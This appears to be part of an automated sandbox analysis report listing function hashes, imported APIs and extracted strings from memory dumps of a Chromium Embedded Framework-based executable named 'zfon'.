                                                                                                • Opcode ID: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                • Instruction ID: 6d03f147cbeb9adb8b27fb92f3160d6f14cfe3e9865261e5a2f21ef2071ab87f
                                                                                                • Opcode Fuzzy Hash: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                • Instruction Fuzzy Hash: 17115E32A2474196E744AF22E944379B2F5FF48395F845135C66D825A8EF3DE0B4C7B0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale___lc_locale_name_func__crt
                                                                                                • String ID:
                                                                                                • API String ID: 2625200093-0
                                                                                                • Opcode ID: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                • Instruction ID: cb281c7f50b6d5fc5eef32d0eb03a6c3268ff3c2dbf57f407823c68dc86a1477
                                                                                                • Opcode Fuzzy Hash: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                • Instruction Fuzzy Hash: A5F0A77AA2838247D7549F58D0C1AA82360FB48790FC04435EF4E422A9CB5CD8CAC600
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$FileSystem
                                                                                                • String ID:
                                                                                                • API String ID: 2086374402-0
                                                                                                • Opcode ID: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                • Instruction ID: fed9de096972e1d49ad89bff175a8d3a43fe34c77d987ec5abdf4645fcdd853f
                                                                                                • Opcode Fuzzy Hash: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                • Instruction Fuzzy Hash: 81E0BF72A296448BDB85CF55F49051AB7B0FB8CB95B446021FA9B87B18DA3CD4548F00

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                • API String ID: 2943138195-1482988683
                                                                                                • Opcode ID: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                • Instruction ID: 9beb810c392dd75c95d1f46afca499ea04f6a459903b88750cbbc2928c288afc
                                                                                                • Opcode Fuzzy Hash: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                • Instruction Fuzzy Hash: AA024B72E18A1698FB589FECD8A41BC77B0BB057C4F545136DB0E56A98EF2CB644C340

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                APIs
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6620
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7F96F6770
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7F96F67BE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F682C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F683C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F684C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6859
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F68A7
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F68F2
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6902
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6912
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F691F
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6966
                                                                                                  • Part of subcall function 00007FF7F970B3E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7F970B43B
                                                                                                  • Part of subcall function 00007FF7F970B3E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7F970B46C
                                                                                                  • Part of subcall function 00007FF7F970B3E0: GetLastError.KERNEL32 ref: 00007FF7F970B49E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69B1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69C1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69D1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69DE
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6A1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@cef_string_map_alloc$??6?$basic_ostream@V01@$??0?$basic_ostream@??0?$basic_streambuf@D@std@@@1@_ErrorLastV?$basic_streambuf@
                                                                                                • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                • API String ID: 2865712288-1385742800
                                                                                                • Opcode ID: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                • Instruction ID: 62455ad4102150101a95b9422dd3116854355c75e5b0ceacbe1249569e03df16
                                                                                                • Opcode Fuzzy Hash: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                • Instruction Fuzzy Hash: ADE19172A08B8685EB54EF25DC543A9A376FB44B98F804135DA6D076EDEF3CD48483A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                • String ID: writeCertHolder
                                                                                                • API String ID: 614388589-1003169611
                                                                                                • Opcode ID: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                • Instruction ID: 0143f51b3cba9704fe18db535a999f336364b67d96fcf2dbc5749f7e424d15b5
                                                                                                • Opcode Fuzzy Hash: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                • Instruction Fuzzy Hash: AD129026A05B4284EB10EF65D8443ADA7B2EB45BD8F944435DE6E07BEDEF38D441C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID: back$forward$reload$scene
                                                                                                • API String ID: 547729093-2287126960
                                                                                                • Opcode ID: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                • Instruction ID: 5ca840b490b9fc70cc2d61067c93f64c92eb2651fd85d168838bd2774a990100
                                                                                                • Opcode Fuzzy Hash: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                • Instruction Fuzzy Hash: 21125062B09B4595EF04EFA5C8543BC6372AF85B88F858435CE2D17BE9EE39D405C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$isspace$memcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4286874901-0
                                                                                                • Opcode ID: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                • Instruction ID: d3db989418aac4fc3a5e44de4002a93aecc4a95a53aad9039914fc1f58b9665d
                                                                                                • Opcode Fuzzy Hash: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                • Instruction Fuzzy Hash: 04A1E322B08B4241EB21BF21E8403BDA7B2AB45BD4F814131DE6D57BDDCE3DD441A3A5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$mallocmemcpymemmove$cef_string_map_alloc
                                                                                                • String ID: URL
                                                                                                • API String ID: 719352336-1657866020
                                                                                                • Opcode ID: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                • Instruction ID: bb3317f1c69675208d18a8a983611ad99e1f379268230e275c9fe5eb449b5c2c
                                                                                                • Opcode Fuzzy Hash: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                • Instruction Fuzzy Hash: 45E18E22B09B8189EB00EFA5D8503AC77B2AB45B9CF444535DE3D1BBD8EE38D419C390
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$Replicator::operator[]
                                                                                                • String ID: `anonymous namespace'
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$memset
                                                                                                • String ID: ://
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                • String ID: clear$writeCertHolder$writeUrl
                                                                                                APIs
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FC2E
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FC82
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FCD2
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FD24
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FEAE
                                                                                                  • Part of subcall function 00007FF8B9115920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911592F
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B910FD9E
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B910FE1C
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B910FE68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: calloc$free$Concurrency::cancel_current_task$ExceptionGetdaysGetmonthsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func_lock_localesmallocmemcpystd::bad_alloc::bad_alloc
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: disable-extensions$disable-gpu$disable-gpu-compositing$disable-gpu-vsync$disable-pdf-extension$disable-surfaces$enable-smooth-scrolling$enable-system-flash
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                • String ID:
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$memcpy$mallocmemmove
                                                                                                • String ID: eu-cookie-compliance-agreed
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addhXp_addxXp_mulhXp_mulx$DscaleStofltStoxfltisspaceisxdigit
                                                                                                • String ID:
                                                                                                • API String ID: 1532609390-0
                                                                                                • Opcode ID: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                • Instruction ID: 3ed6a87b60d397f4e214b71bc3e074c63d664ac97631c5b88bd8d2d044f1fd43
                                                                                                • Opcode Fuzzy Hash: 04dc50dfbf98f029935054b8049ea78db01762cf3d60922a2d415e396d3f7e9b
                                                                                                • Instruction Fuzzy Hash: 5D617222F0C9829AEF11DEAED4416FD2721AB54788F504636EF1D67B99DE38E50B8700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xp_setw$Xp_setn$Xp_addxXp_mulxiswctype$DscaleStofltStoxfltXp_addhXp_mulh
                                                                                                • String ID:
                                                                                                • API String ID: 3318484812-0
                                                                                                • Opcode ID: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                • Instruction ID: 3d92fecd46edf2c88b524f2c748682be350678569337f194c04c175535e4ca4a
                                                                                                • Opcode Fuzzy Hash: a768420c2b5fff2fb4244aeac776d75f58bcfee5bf1117b7cc1e02417c62bbbc
                                                                                                • Instruction Fuzzy Hash: 9C61B122F1CE8682EE11DE6DE4805AE6760FB94784F500532EF5E536A9DE3CE94AC700
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
